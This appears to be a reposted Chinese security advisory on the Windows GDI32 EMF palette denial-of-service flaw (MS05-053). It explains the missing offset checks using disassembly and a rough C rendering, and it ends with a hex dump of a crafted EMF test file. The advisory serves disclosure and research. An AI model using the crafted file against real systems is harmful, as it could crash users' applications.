Microsoft Windows图形设备接口库拒绝服务漏洞（MS05-053）

发布日期：2005-03-18
更新日期：2005-11-09

受影响系统：

Microsoft Windows XP SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4

不受影响系统：

Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP1
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98

描述：

---

BUGTRAQ ID: 12834
CVE(CAN) ID: CVE-2005-0803

Microsoft Windows 是微软推出的用途非常广泛的操作系统。

Windows的GDI32.DLL GetEnhMetaFilePaletteEntries() API不能正确的处理EMF文件，导致调用API的应用程序在读取某些特制的EMF文件时可能崩溃。

有漏洞的代码如下：

----------------------------------------------------------
反编译的GDI32.GetEnhMetaFilePaletteEntries()
----------------------------------------------------------
77F68CC7 PUSH ESI
77F68CC8 PUSH EDI
77F68CC9 PUSH 460000
77F68CCE PUSH DWORD PTR SS:[ESP 10]
77F68CD2 CALL GDI32.77F48A89
77F68CD7 TEST EAX,EAX
77F68CD9 JNZ SHORT GDI32.77F68CE0
77F68CDB OR EAX,FFFFFFFF
77F68CDE JMP SHORT GDI32.77F68D11
77F68CE0 MOV EDI,DWORD PTR SS:[ESP 14]
77F68CE4 TEST EDI,EDI
77F68CE6 JNZ SHORT GDI32.77F68CF0
77F68CE8 MOV EAX,DWORD PTR DS:[EAX C]
77F68CEB MOV EAX,DWORD PTR DS:[EAX 44]
77F68CEE JMP SHORT GDI32.77F68D11
77F68CF0 MOV ECX,DWORD PTR DS:[EAX C]
77F68CF3 MOV EAX,DWORD PTR DS:[ECX 44]
77F68CF6 CMP DWORD PTR SS:[ESP 10],EAX
77F68CFA JNB SHORT GDI32.77F68D00
77F68CFC MOV EAX,DWORD PTR SS:[ESP 10]
77F68D00 MOV EDX,DWORD PTR DS:[ECX 30]
77F68D03 ADD EDX,ECX
77F68D05 MOV ECX,EAX
77F68D07 SUB EDX,DWORD PTR DS:[EDX-4]
77F68D0A MOV ESI,DWORD PTR DS:[EDX C]
77F68D0D ADD ESI,EDX
77F68D0F REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
77F68D11 POP EDI
77F68D12 POP ESI
77F68D13 RETN 0C
-----------------------------------------------------------
翻译为C代码
-----------------------------------------------------------
UINT GetEnhMetaFilePaletteEntries(
HENHMETAFILE hemf, // handle of enhanced metafile
UINT cEntries, // count of palette entries
LPPALETTEENTRY lppe // address of palette-entry array
)
{
char *begin, *end, *emreof, *palent;
DWORD count, i;

// ......

begin = emf file offset in memory;

// get the count of palette entries from the emf file
count = *((DWORD *)(begin 0x44));

if (lppe == 0)
return count;

if (size > count)
size = count;

// find the end of the emf file
end = begin *((DWORD *)(bigin 0x30));

// find the offset of emreof
emreof = end - *((DWORD *)(end - 0x04));

// find the offset of palentries
palent = emreof *((DWORD *)(emreof 0x0c));

// copy the palent from the file to palette-entry array
for (i = 0; i < size; i )
memcpy(lppe i, palent i * 4, 4);

return size;
}
-----------------------------------------------------------

可见没有有效性检查，因此可能在使用从EMF读取的偏移值（end，emreof，palent）时导致访问破坏。

这个漏洞的具体影响取决于使用API的应用程序。一般来讲，如果EMRHEAD->nPalEntries中存在非0的值，应用程序就会调用这个API，并向第二个参数传送EMRHEAD->nPalEntries。如果特制的EMF所访问的地址无效的话，就会导致应用程序崩溃。

<*来源：Hongzhen Zhou （felix__zhou@hotmail.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111108743527497&w=2
http://www.microsoft.com/technet/security/Bulletin/MS05-053.mspx
http://www.us-cert.gov/cas/techalerts/TA05-312A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

16进制的临时存贮EMF文件：
-------------------------------------------------------
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00
0000050 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!